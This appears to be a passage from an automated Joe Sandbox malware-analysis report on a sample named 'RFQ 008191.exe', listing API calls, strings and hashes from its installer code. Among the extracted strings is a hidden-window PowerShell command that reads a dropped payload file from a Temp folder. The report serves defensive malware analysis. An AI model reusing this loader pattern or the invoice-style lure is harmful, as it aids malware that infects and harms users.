                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                      • Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                      • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                      • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                      • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                                    • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                    • A, xrefs: 00404AD4
                                                                    • powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 004049CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: : Completed$A$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                                                    • API String ID: 2624150263-880862450
                                                                    • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                    • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405C76
                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CBE
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CE1
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CE7
                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CF7
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                    • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                    Strings
                                                                    • \*.*, xrefs: 00405CB8
                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 00405C56
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-1450423552
                                                                    • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                    • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean, xrefs: 0040228E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean
                                                                    • API String ID: 542301482-2601639953
                                                                    • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                    • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                    • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                    • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                    • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                    • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                    • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                    • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                    • DeleteObject.GDI32(00000000), ref: 00405027
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                    • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                    • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                    • ShowWindow.USER32(00000000), ref: 00405523
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                    • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                    • GetSysColor.USER32(?), ref: 0040475F
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                    • lstrlenW.KERNEL32(?), ref: 00404780
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                    • SendMessageW.USER32(00000000), ref: 00404802
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                    • SetCursor.USER32(00000000), ref: 00404881
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                    • SetCursor.USER32(00000000), ref: 0040489D
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: : Completed$N
                                                                    • API String ID: 3103080414-2140067464
                                                                    • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                    • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                    • wsprintfA.USER32 ref: 00406206
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                    • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                    • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                    • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                    • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    Strings
                                                                    • *?|<>/":, xrefs: 00406841
